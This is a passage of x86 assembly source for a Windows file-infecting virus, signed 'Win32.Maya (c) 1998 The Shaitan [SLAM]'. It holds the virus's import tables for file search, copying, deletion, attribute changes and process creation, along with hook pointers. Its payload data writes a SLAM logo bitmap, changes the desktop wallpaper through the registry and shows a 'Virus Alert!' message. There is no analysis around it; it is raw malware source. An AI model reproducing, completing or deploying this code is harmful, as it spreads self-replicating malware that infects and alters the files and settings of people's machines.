maya_findfirstfilea_add		dd 0

maya_findnextfilea_len		dd 14
maya_findnextfilea		db 'FindNextFileA',0
maya_findnextfilea_add		dd 0

maya_findclose_len		dd 10
maya_findclose			db 'FindClose',0
maya_findclose_add		dd 0

maya_setfilepointer_len		dd 15
maya_setfilepointer		db 'SetFilePointer',0
maya_setfilepointer_add		dd 0

maya_setendoffile_len		dd 13
maya_setendoffile		db 'SetEndOfFile',0
maya_setendoffile_add		dd 0

maya_getcurrentdirectorya_len	dd 15h
maya_getcurrentdirectorya	db 'GetCurrentDirectoryA',0
maya_getcurrentdirectorya_add	dd 0

maya_setcurrentdirectorya_len	dd 15h
maya_setcurrentdirectorya	db 'SetCurrentDirectoryA',0
maya_setcurrentdirectorya_add	dd 0

maya_getfileattributesa_len	dd 13h
maya_getfileattributesa		db 'GetFileAttributesA',0
maya_getfileattributesa_add	dd 0

maya_setfileattributesa_len	dd 13h
maya_setfileattributesa		db 'SetFileAttributesA',0
maya_setfileattributesa_add	dd 0

maya_getsystemtime_len		dd 14
maya_getsystemtime		db 'GetSystemTime',0
maya_getsystemtime_add		dd 0

maya_getwindowsdirectorya_len	dd 15h
maya_getwindowsdirectorya	db 'GetWindowsDirectoryA',0
maya_getwindowsdirectorya_add	dd 0

maya_maya	dd 'MAYA'	;endmarker

maya_movefilea_len		dd 10
maya_movefilea			db 'MoveFileA',0
maya_movefilea_add		dd 0
				dd offset maya_deadcode_call1

maya_copyfilea_len		dd 10
maya_copyfilea			db 'CopyFileA',0
maya_copyfilea_add		dd 0
				dd offset maya_deadcode_call2

maya_createfilea2_len		dd 12
maya_createfilea2		db 'CreateFileA',0
maya_createfilea2_add		dd 0
				dd offset maya_deadcode_call3

maya_deletefilea_len		dd 12
maya_deletefilea		db 'DeleteFileA',0
maya_deletefilea_add		dd 0
				dd offset maya_deadcode_call4

maya_setfileattributesa2_len	dd 13h
maya_setfileattributesa2	db 'SetFileAttributesA',0
maya_setfileattributesa2_add	dd 0
				dd offset maya_deadcode_call5

maya_getfileattributesa2_len	dd 13h
maya_getfileattributesa2	db 'GetFileAttributesA',0
maya_getfileattributesa2_add	dd 0
				dd offset maya_deadcode_call6

maya_getfullpathnamea_len	dd 11h
maya_getfullpathnamea		db 'GetFullPathNameA',0
maya_getfullpathnamea_add	dd 0
				dd offset maya_deadcode_call7

maya_createprocessa_len		dd 15
maya_createprocessa		db 'CreateProcessA',0
maya_createprocessa_add		dd 0
				dd offset maya_deadcode_call8

maya_shai		dd 'SHAI'	;endmarker

;
;payload stuff
;

maya_cpd		db 'Control Panel\Desktop',0
maya_reg		dd 0	;@1E76
maya_one		db '1',0	;@1E7A
maya_zero		db '0',0	;@1E7C
maya_tilewallpaper	db 'TileWallpaper',0 ;@1E7E
maya_wallpaperstyle	db 'WallpaperStyle',0
maya_slamfilename	db 'SLAM.BMP',0		;@1E9B
maya_slamhandle		dd 0		;handle of created SLAM.BMP @1EA4
maya_numberofwritten	dd 0		;paramter of WriteFile
maya_mayamsg		db 'Win32.Maya (c) 1998 The Shaitan [SLAM]',0
maya_viralert		db 'Virus Alert!',0
maya_user32		db 'USER32.dll',0	;@1EE0
maya_advapi32		db 'ADVAPI32.dll',0	;@1EEB
maya_u32hand		dd 0		;handle to user32 @1EF8
maya_a32hand		dd 0		;handle to advapi32 @1EFC
maya_dd5		dd 0		;????		@1F00
maya_regopenkeyexa	db 'RegOpenKeyExA',0		;@1F04
maya_regsetvalueexa	db 'RegSetValueExA',0		;
maya_messageboxa	db 'MessageBoxA',0		;
maya_sysparam		db 'SystemParametersInfoA',0
maya_regopenkeyexa_add	dd 0		;add of fn	@1F43
maya_regsetvalueexa_add	dd 0		;add of fn	@1F47
maya_messageboxa_add	dd 0		;add of fn	@1F4B
maya_sysparam_add	dd 0		;add of fn	@1F4F
;
;the 'SLAM' logo stored in bitmap file format
;
slam_len equ 230	;@1F53
slam db  66, 77,230,  0,  0,  0,  0,  0,  0,  0, 62,  0,  0,  0, 40,  0,  0,  0, 60
     db   0,  0,  0, 21,  0,  0,  0,  1,  0,  1,  0,  0,  0,  0,  0,168,  0,  0,  0
     db 196, 14,  0,  0,196, 14,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0,  0
     db   0,255,255,255,  0,255,255,255,255,255,255,255,240,255,255,255,255,255,255
     db 255,240,255,255,255,255,255,255,255,240,255,255,255,255,255,255,255,240,224
     db   2,  0,131,226, 14, 60,112,224,  2,  0,131,226, 14, 60,112,227,130, 15,131
     db 226, 14, 60,112,227,130, 15,131,226, 14, 60,112,227,130, 15,128,  2, 14, 60
     db 112,255,130, 15,128,  2, 14, 60,112,224,  2, 31,195,134, 30, 60,112,224,  2
     db  63,227,142, 62, 60,112,227,254, 63,227,142, 62, 60,112,227,226, 63,227,142
     db  62, 60,112,227,226, 63,227,142, 62, 60,112,227,226, 63,227,142, 62, 60,112
     db 224,  2, 63,224, 14,  0,  0,112,224,  2, 63,224, 14,  0,  0,112,255,255,255
     db 255,255,255,255,240,255,255,255,255,255,255,255,240,255,255,255,255,255,255
     db 255,240

maya_end equ $	

.data
host:
	push 0
	call ExitProcess


end maya